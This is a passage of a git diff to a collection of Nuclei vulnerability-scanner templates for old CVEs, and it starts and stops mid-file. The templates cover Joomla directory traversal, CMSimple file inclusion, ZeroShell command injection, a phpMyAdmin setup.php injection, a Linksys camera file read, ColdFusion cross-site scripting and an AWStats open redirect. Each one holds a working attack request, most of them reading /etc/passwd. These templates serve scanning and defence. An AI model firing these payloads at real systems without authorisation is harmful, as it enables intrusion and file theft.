/index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/nuclei-templates/CVE-2008/CVE-2008-4764.yaml b/nuclei-templates/CVE-2008/CVE-2008-4764.yaml deleted file mode 100644 index 0b0db9bff6..0000000000 --- a/nuclei-templates/CVE-2008/CVE-2008-4764.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2008-4764 - -info: - name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. - reference: - - https://www.exploit-db.com/exploits/5435 - - https://www.cvedetails.com/cve/CVE-2008-4764 - - http://www.securityfocus.com/bid/28764 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873 - classification: - cve-id: CVE-2008-4764 - tags: cve,cve2008,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2008/CVE-2008-6080.yaml b/nuclei-templates/CVE-2008/CVE-2008-6080.yaml deleted file mode 100644 index 7ce462f492..0000000000 --- a/nuclei-templates/CVE-2008/CVE-2008-6080.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2008-6080 - -info: - name: Joomla! Component ionFiles 4.4.2 - File Disclosure - author: daffainfo - severity: high - description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/6809 - - https://www.cvedetails.com/cve/CVE-2008-6080 - - http://secunia.com/advisories/32377 - - http://www.securityfocus.com/bid/31877 - classification: - cve-id: CVE-2008-6080 - tags: cve,cve2008,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2008/CVE-2008-6172.yaml b/nuclei-templates/CVE-2008/CVE-2008-6172.yaml deleted file mode 100644 index d63bd5c944..0000000000 --- a/nuclei-templates/CVE-2008/CVE-2008-6172.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2008-6172 - -info: - name: Joomla! Component RWCards 3.0.11 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. - reference: - - https://www.exploit-db.com/exploits/6817 - - https://www.cvedetails.com/cve/CVE-2008-6172 - - http://secunia.com/advisories/32367 - - http://www.securityfocus.com/bid/31892 - classification: - cve-id: CVE-2008-6172 - tags: cve,cve2008,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/CVE-2008/cve-2008-6668.yaml b/nuclei-templates/CVE-2008/CVE-2008-6668.yaml similarity index 100% rename from nuclei-templates/CVE-2008/cve-2008-6668.yaml rename to nuclei-templates/CVE-2008/CVE-2008-6668.yaml diff --git a/nuclei-templates/CVE-2008/cve-2008-2650.yaml b/nuclei-templates/CVE-2008/cve-2008-2650.yaml new file mode 100644 index 0000000000..56d8f91191 --- /dev/null +++ b/nuclei-templates/CVE-2008/cve-2008-2650.yaml @@ -0,0 +1,25 @@ +id: CVE-2008-2650 +info: + name: CMSimple 3.1 - Local File Inclusion + author: pussycat0x + severity: high + description: | + Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. + reference: https://www.exploit-db.com/exploits/5700 + tags: cve,cve2008,lfi +requests: + - raw: + - | + GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2008/cve-2008-4764.yaml b/nuclei-templates/CVE-2008/cve-2008-4764.yaml new file mode 100644 index 0000000000..309174ce27 --- /dev/null +++ b/nuclei-templates/CVE-2008/cve-2008-4764.yaml @@ -0,0 +1,27 @@ +id: CVE-2008-4764 + +info: + name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. + reference: + - https://www.exploit-db.com/exploits/5435 + - https://www.cvedetails.com/cve/CVE-2008-4764 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2008/cve-2008-6080.yaml b/nuclei-templates/CVE-2008/cve-2008-6080.yaml new file mode 100644 index 0000000000..d326f80636 --- /dev/null +++ b/nuclei-templates/CVE-2008/cve-2008-6080.yaml @@ -0,0 +1,27 @@ +id: CVE-2008-6080 + +info: + name: Joomla! Component ionFiles 4.4.2 - File Disclosure + author: daffainfo + severity: high + description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/6809 + - https://www.cvedetails.com/cve/CVE-2008-6080 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2008/cve-2008-6172.yaml b/nuclei-templates/CVE-2008/cve-2008-6172.yaml new file mode 100644 index 0000000000..8d57e5e23a --- /dev/null +++ b/nuclei-templates/CVE-2008/cve-2008-6172.yaml @@ -0,0 +1,27 @@ +id: CVE-2008-6172 + +info: + name: Joomla! Component RWCards 3.0.11 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. + reference: + - https://www.exploit-db.com/exploits/6817 + - https://www.cvedetails.com/cve/CVE-2008-6172 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-0545.yaml b/nuclei-templates/CVE-2009/CVE-2009-0545.yaml deleted file mode 100644 index 8201ec2932..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-0545.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2009-0545 - -info: - name: ZeroShell <= 1.0beta11 Remote Code Execution - author: geeknik - severity: critical - description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. - reference: - - https://www.exploit-db.com/exploits/8023 - - https://nvd.nist.gov/vuln/detail/CVE-2009-0545 - - http://www.zeroshell.net/eng/announcements/ - - http://www.ikkisoft.com/stuff/LC-2009-01.txt - classification: - cve-id: CVE-2009-0545 - tags: cve,cve2009,zeroshell,kerbynet,rce - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" - - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/04/18 diff --git a/nuclei-templates/CVE-2009/CVE-2009-1151.yaml b/nuclei-templates/CVE-2009/CVE-2009-1151.yaml new file mode 100644 index 0000000000..cc013e8a10 --- /dev/null +++ b/nuclei-templates/CVE-2009/CVE-2009-1151.yaml @@ -0,0 +1,38 @@ +id: CVE-2009-1151 +info: + name: PhpMyAdmin Scripts - Remote Code Execution + author: princechaddha + severity: critical + description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + reference: + - https://www.phpmyadmin.net/security/PMASA-2009-3/ + - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 + - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301 + - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php + - https://nvd.nist.gov/vuln/detail/CVE-2009-1151 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2009-1151 + cwe-id: CWE-77 + tags: cve,cve2009,phpmyadmin,rce,deserialization,kev +requests: + - raw: + - | + POST /scripts/setup.php HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Content-Type: application/x-www-form-urlencoded + + action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/07/06 diff --git a/nuclei-templates/CVE-2009/CVE-2009-1558.yaml b/nuclei-templates/CVE-2009/CVE-2009-1558.yaml deleted file mode 100644 index c70f6219f8..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-1558.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2009-1558 - -info: - name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. - reference: - - https://www.exploit-db.com/exploits/32954 - - http://www.securityfocus.com/bid/34713 - - http://www.vupen.com/english/advisories/2009/1173 - - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/ - classification: - cve-id: CVE-2009-1558 - tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-1872.yaml b/nuclei-templates/CVE-2009/CVE-2009-1872.yaml deleted file mode 100644 index 2d24e45838..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-1872.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2009-1872 - -info: - name: Adobe Coldfusion 8 linked XSS vulnerabilies - author: princechaddha - severity: medium - description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. - reference: - - https://www.securityfocus.com/archive/1/505803/100/0/threaded - - https://www.tenable.com/cve/CVE-2009-1872 - - http://www.adobe.com/support/security/bulletins/apsb09-12.html - - http://www.dsecrg.com/pages/vul/show.php?id=122 - classification: - cve-id: CVE-2009-1872 - metadata: - shodan-query: http.component:"Adobe ColdFusion" - verified: "true" - tags: cve,cve2009,adobe,xss,coldfusion - -requests: - - method: GET - path: - - '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-2100.yaml b/nuclei-templates/CVE-2009/CVE-2009-2100.yaml deleted file mode 100644 index 0b560673c6..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-2100.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2009-2100 - -info: - name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8946 - - https://www.cvedetails.com/cve/CVE-2009-2100 - - http://www.securityfocus.com/bid/35378 - - http://osvdb.org/55176 - classification: - cve-id: CVE-2009-2100 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-3318.yaml b/nuclei-templates/CVE-2009/CVE-2009-3318.yaml new file mode 100644 index 0000000000..2e1f8c8283 --- /dev/null +++ b/nuclei-templates/CVE-2009/CVE-2009-3318.yaml @@ -0,0 +1,30 @@ +id: CVE-2009-3318 + +info: + name: Joomla! Component com_album 1.14 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/9706 + - https://www.cvedetails.com/cve/CVE-2009-3318 + - http://www.securityfocus.com/bid/36441 + classification: + cve-id: CVE-2009-3318 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-4202.yaml b/nuclei-templates/CVE-2009/CVE-2009-4202.yaml deleted file mode 100644 index 95e235cf67..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-4202.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2009-4202 - -info: - name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8870 - - https://www.cvedetails.com/cve/CVE-2009-4202 - - http://www.vupen.com/english/advisories/2009/1494 - - http://www.securityfocus.com/bid/35201 - classification: - cve-id: CVE-2009-4202 - tags: cve,cve2009,joomla,lfi,photo - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-5020.yaml b/nuclei-templates/CVE-2009/CVE-2009-5020.yaml deleted file mode 100644 index 53060c8ed3..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-5020.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2009-5020 - -info: - name: AWStats < 6.95 - Open Redirect - author: pdteam - severity: medium - description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2009-5020 - - http://awstats.sourceforge.net/docs/awstats_changelog.txt - remediation: Apply all relevant security patches and product upgrades. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2009-5020 - cwe-id: CWE-601 - tags: cve,cve2020,redirect,awstats - -requests: - - method: GET - path: - - '{{BaseURL}}/awstats/awredir.pl?url=example.com' - - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com' - stop-at-first-match: true - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2009/cve-2009-0545.yaml b/nuclei-templates/CVE-2009/cve-2009-0545.yaml new file mode 100644 index 0000000000..7f00ae437c --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-0545.yaml @@ -0,0 +1,20 @@ +id: CVE-2009-0545 + +info: + name: ZeroShell <= 1.0beta11 Remote Code Execution + author: geeknik + description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action. + reference: https://www.exploit-db.com/exploits/8023 + severity: critical + tags: cve,cve2009,zeroshell,kerbynet,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" + + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0:" diff --git a/nuclei-templates/CVE-2009/cve-2009-1151.yaml b/nuclei-templates/CVE-2009/cve-2009-1151.yaml deleted file mode 100644 index 36ff315c20..0000000000 --- a/nuclei-templates/CVE-2009/cve-2009-1151.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2009-1151 - -info: - name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability - author: princechaddha - severity: high - description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. - reference: - - https://www.phpmyadmin.net/security/PMASA-2009-3/ - - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 - tags: cve,cve2009,phpmyadmin,rce,deserialization - -requests: - - raw: - - | - POST /scripts/setup.php HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Content-Type: application/x-www-form-urlencoded - - action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2009/cve-2009-1558.yaml b/nuclei-templates/CVE-2009/cve-2009-1558.yaml new file mode 100644 index 0000000000..0459548703 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-1558.yaml @@ -0,0 +1,24 @@ +id: CVE-2009-1558 + +info: + name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. + reference: https://www.exploit-db.com/exploits/32954 + tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-1872.yaml b/nuclei-templates/CVE-2009/cve-2009-1872.yaml new file mode 100644 index 0000000000..2020a26398 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-1872.yaml @@ -0,0 +1,32 @@ +id: CVE-2009-1872 + +info: + name: Adobe Coldfusion 8 linked XSS vulnerabilies + author: princechaddha + severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. + reference: + - https://www.securityfocus.com/archive/1/505803/100/0/threaded + - https://www.tenable.com/cve/CVE-2009-1872 + tags: cve,cve2009,adobe,xss,coldfusion + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-2100.yaml b/nuclei-templates/CVE-2009/cve-2009-2100.yaml new file mode 100644 index 0000000000..db846d97e7 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-2100.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-2100 + +info: + name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8946 + - https://www.cvedetails.com/cve/CVE-2009-2100 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2009/cve-2009-3318.yaml b/nuclei-templates/CVE-2009/cve-2009-3318.yaml deleted file mode 100644 index 957a9932a2..0000000000 --- a/nuclei-templates/CVE-2009/cve-2009-3318.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2009-3318 - -info: - name: Joomla! Component com_album 1.14 - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/9706 - - https://www.cvedetails.com/cve/CVE-2009-3318 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2009/cve-2009-4202.yaml b/nuclei-templates/CVE-2009/cve-2009-4202.yaml new file mode 100644 index 0000000000..8f872ac535 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-4202.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-4202 + +info: + name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8870 + - https://www.cvedetails.com/cve/CVE-2009-4202 + tags: cve,cve2009,joomla,lfi,photo + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-5020.yaml b/nuclei-templates/CVE-2009/cve-2009-5020.yaml new file mode 100644 index 0000000000..e83a16a01a --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-5020.yaml @@ -0,0 +1,28 @@ +id: CVE-2009-5020 + +info: + name: AWStats < 6.95 - Open redirect + author: pdteam + severity: medium + description: Open redirect vulnerability in awredir.pl in AWStats before 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. + reference: https://nvd.nist.gov/vuln/detail/CVE-2009-5020 + tags: cve,cve2020,redirect,awstats + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2009-5020 + cwe-id: CWE-601 + + +requests: + - method: GET + path: + - '{{BaseURL}}/awstats/awredir.pl?url=example.com' + - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com' + + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0157.yaml b/nuclei-templates/CVE-2010/CVE-2010-0157.yaml index 4be62d0cfa..84ce7e02b3 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-0157.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-0157.yaml @@ -4,27 +4,24 @@ info: name: Joomla! Component com_biblestudy - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. + description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. reference: - https://www.exploit-db.com/exploits/10943 - https://www.cvedetails.com/cve/CVE-2010-0157 - - http://secunia.com/advisories/37896 - - http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-0157 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 -# Enhanced by mp on 2022/02/13 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/CVE-2010-0467.yaml b/nuclei-templates/CVE-2010/CVE-2010-0467.yaml index 1ce0e2d08e..6bb7060bae 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-0467.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-0467.yaml @@ -4,30 +4,29 @@ info: name: Joomla! Component CCNewsLetter - Local File Inclusion author: daffainfo severity: medium - description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. - reference: + description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. + reference: | - https://www.exploit-db.com/exploits/11282 - https://www.cvedetails.com/cve/CVE-2010-0467 - - http://www.securityfocus.com/bid/37987 - - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html - remediation: Apply all relevant security patches and upgrades. + tags: cve,cve2010,joomla,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 + cvss-score: 5.80 cve-id: CVE-2010-0467 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 -# Enhanced by mp on 2022/02/13 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-0942.yaml b/nuclei-templates/CVE-2010/CVE-2010-0942.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-0942.yaml rename to nuclei-templates/CVE-2010/CVE-2010-0942.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-0943.yaml b/nuclei-templates/CVE-2010/CVE-2010-0943.yaml index 8df6ca1a65..14b6b3f668 